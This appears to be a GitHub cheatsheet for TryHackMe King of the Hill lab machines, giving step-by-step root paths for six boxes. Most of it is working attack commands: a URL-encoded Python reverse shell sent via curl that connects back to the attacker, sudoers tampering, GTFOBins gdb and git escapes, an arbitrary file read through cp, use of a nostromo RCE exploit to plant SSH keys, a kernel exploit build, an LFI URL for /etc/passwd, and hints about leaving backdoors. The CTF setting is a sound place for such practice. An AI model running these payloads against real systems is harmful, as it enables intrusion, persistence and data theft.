/King-of-the-hill

This is the walkthrough and cheatsheet of Machines on King of the hill on the online hacking platform TryHackme.

MIT LicenseMIT

This is a work in progress, Many more machine cheatsheets will be updated very soon.

Active Contributors :

Sorry I am lazy AF, will update more machines soon!

I am not posting the methods that are 'technically' better, I am posting methods that will be easiest to do and will get you win. Target is to win while being inside the rules. This is not an exam, there are no wrong answers. As the saying goes, If it works, don't touch it.

This a github cheatsheet of owning the machines in King of the Hill game of TryHackMe.

Index of Machine Covered:

  1. Food
  2. Shrek
  3. SpaceJam
  4. Fortune
  5. Production
  6. Lion
  7. Hackers

Machine name: FOOD

NMAP scan with -p- revealed that there is a telnet running on port 46969.

So following are the steps to get root, ASAP.

  1. Connect on the port:
    telnet <IP> 46969
  2. The Username and password are in caesor cipher.
    Username: food
    Password: givemecookies
  3. After scanning the machine with linPEAS.sh, We found that vim.basic binary is vuln to read and write to privilaged files. vim.basic /etc/sudoers
    Press i
    Add this line after the line with root is the start.
    food ALL=(ALL:ALL) ALL
    Press Ctrl+[
    Press :w! Enter
    Press :q! Enter
    sudo su
    In prompt enter the password of food, i.e. givemecookies

    YOU ARE ROOT. NOW DEFEND YOUR TITILE.

Machine name: SHREK

This is first and relatively easy machine, But beaware this things have too many entries to keep an eye on, Best Idea for defending this is by just killing the shells. Again I am not posting the methods that are 'technically' better, I am posting methods that will be easiest to do and will get you win. Target is to win while being inside the rules. This is not an exam, there are no wrong answers. As the saying goes, If it works, don't touch it.

  1. Initial gobuster scan revealed that robots.txt file contains an abnormal entry, When we navigate to it, we find the entire RSA key.

image

  1. Copy the key, paste it in a file, give the file necessary permissions.
    Assuming you made the RSA key file with the name id_rsa, follow these commands.
    chmod 600 id_rsa
    ssh -i id_rsa shrek@<IP ADDRESS OF MACHINE>
    This will give you a shell to shrek.

  2. After scanning the machine with linPEAS.sh, We found tha there is a gdb vulnerabilty in the box, using GTFObins, We use the following commands to do Privilage escalation.
    gdb -nx -ex 'python import os; os.execl("/bin/sh", "sh", "-p")' -ex quit

YOU ARE ROOT. NOW DEFEND YOUR TITILE.

Machine name: SPACE JAM

This machine is race to root kind of thing, There is a very low hanging fruit to get root, But it is a way use only entry, i.e. Whoever uses it first will try his best to destory this entry as it is too open.

  1. As always we do the basic nmap scan.
    image

  2. We can see port 3000 is hosting Nodejs openly, So we try to get the reverse shell from it.
    To do that, First start a listener on your machine using these commands:
    ncat -lvnp 4444 // I am using ncat, since I am on a Arch based system, You can use nc inplace of ncat.
    Once the listener is ready, we deploy the payload.

  3. After testing many payloads we found the one of python to be working, For more payloads, follow this link.
    The payload:
    REPLACE <REMOTE_IP> with the IP of box.
    REPLACE <LOCAL_IP> with the IP of your tryhackme VPN.

     curl "<REMOTE_IP>:3000/?cmd=python%20-c%20%27import%20socket%2Csubprocess%2Cos%3Bs%3Dsocket.socket%28socket.AF_INET%2Csocket.SOCK_STREAM%29%3Bs.connect%28%28%22<LOCAL_IP>%22%2C4444%29%29%3Bos.dup2%28s.fileno%28%29%2C0%29%3B%20os.dup2%28s.fileno%28%29%2C1%29%3B%20os.dup2%28s.fileno%28%29%2C2%29%3Bp%3Dsubprocess.call%28%5B%22%2Fbin%2Fsh%22%2C%22-i%22%5D%29%3B%27"
    

    On listener, you can see that we have a shell now.

  4. After trying a lot of tests and linPEAS, I found that the easiest method to get king AND root shell is to exploit the cp vulnerability on the box. I am leaving the ideas to you for this one, but after making you king.

    LFILE=/root/king.txt
    echo "<YOUR USERNAME>" | cp /dev/stdin "$LFILE"

YOU ARE KING. NOW DEFEND YOUR TITILE.

Free Tip: (You know you can read anyfile with this vuln, use your imagination.)
LFILE=file_to_read
cp "$LFILE" /dev/stdout

Machine name: FORTUNE

Now this is new machine, Released very recently,
And made it hard for me to post direct commands, Why?
Heres why, In this machine, there's a thing called autogen script, that regenrates everything at every reset. That means direct credentials doesn't work anymore. So you have to follow the instructions and do everything manually.
Let's Hack:

  1. Initial nmap scans revealed that theres a netcat port open at 3333.
    image
UPDATE, you can skip next 2 steps and directly use the command in Shortcut Note.
  1. When we connect to it, It gives out a weird base64 hash, After fiddling around, I found that it is base data of a zip file, so we use this Site.
    Copy the base64 hash to this site, and it will generate a file named application.zip.

  2. Now when we try to open the file, The file needs a password, Just crack this file using fcrackzip and wordlist rockyou.txt.
    fcrackzip -v -u -D -p ~/wordlists/rockyou.txt application.zip
    Once you have the password, unzip it.
    unzip application.zip

Shortcut Note: MAKE SURE TO DO THE FOLLOWING EDITS:

$IP = IP of KoTH box
$location = address of your rockyou wordlist
Copy the hash in a file,

cat file.txt | base64 -d > test.zip; unzip -P (fcrackzip -v -u -D -p $location/rockyou.txt test.zip | grep "pw" |awk '{print $5}') test.zip; cat creds.txt

You get a file named creds.txt, Inside it we have the login details of user named fortuna. Lets GO.
4. Using the creds,
ssh fortuna@<BOX IP>
5. Now that we have the shell, We can work on Privilage escalation.
After linpeas and basic test, I found that:
5.1 We as fortuna are in sudoers list.
5.2 And we also have pico in the sudo -l list.

  1. We can simply edit the /etc/sudoers/ file to give us ALL permissions to run sudo.
  2. Using this command:
    sudo pico /etc/sudoers
    Replace pico in sudoers file with ALL.
  3. Now you can just do, sudo su and you are root.

You are ROOT, now defend your title.

Machine name: PRODUCTION

This machine is one of the easist ones.
image

  1. Basic enumeration will get you the password/ssh id_rsa key of user Ashu.
  2. Once you are in machine with user as Ashu.
    Check the sudo -l, you will see that you can run su on for user skiddy without password.
  3. After, sudo su skiddy , You are in the skiddy shell.
  4. We don't need to enumerate this machine anymore. The sudo -l can show that we can run git as sudo.
  5. Using GTFObins, we see that the following commands can be used to give us root shell.
    sudo git -p help config
    !/bin/sh
    Now, id, Voila, You are root.

P.S. Food for thought, there are two interesting ports open on machine, see if you can setup backdoors for you ;)

You are ROOT, now defend your title.

Machine name: Lion

  1. After nmap scan we can see that weirdly there is no ssh on the machine. But nostromo is present at port 8080.
    Later after doing complete scan we found that the port for ssh is shifted to port 1337.
    image

  2. Searching for this vuln, we found that this specific version is vulnerable to CVE-2019-16278. nostromo

  3. Simply downloading the exploit from exploitdb, we can get RCE on machine. Note this CVE is python2 based.
    python2 cve2019-16278.py <KOTH MACHINE IP> 8080 "whoami"
    whoami

Online there are methods to use this CVE to get a reverse shell. But For some weird reason I was not able to get a rev shell from this. So here's my workaround.
First we generate sshkey in our machine, then we add the authorized_keys to the machine, as we have RCE.
4. Generating sshkeys:
ssh-keygen
5. Getting the authorized_keys:
We need the *.pub file's data for this, It would look like this:
auth_key
6. Now use this command:
python2 cve2019-16278.py <KOTH IP> 8080 "mkdir /home/gloria/.ssh; echo '<YOUR *.pub file data>' > /home/gloria/.ssh/authorized_keys"
7. Now we can simply ssh into the machine with our sshkey.
ssh -i sshkey gloria@<KOTH BOX IP> -p 1337
8. And since we are in authorized_keys, we will be logged in without password.
9. Since we have a shell, Priv Esc is the next step. After some LinPEAS and LinEnum, I found that this box's kernel is vulnerable to cve-2017-16995.
10. So we download the exploit from exploitdb and Here's a little trick to save compiling time on remote machine.
Instead of uploading and compiling the exploit on remote machine, we can use --static in gcc to make a binary that's useable everywhere.
gcc --static cve-2017-16995.c -o cve-2017-16995 && chmod +x cve-2017-16995
11. Now just upload the binary to the remote box, and run it to get root.

Now you are root, Defend your title.

P.S. If you are locked out and forgot to make a backdoor, here's food for thought:
There's LFI on this address.
http://lion.thm:5555/?page=php://filter/convert.base64-encode/resource=../../../../etc/passwd
where, lion.thm is the IP of machine in hosts file. ;) (Maybe you can get id_rsa)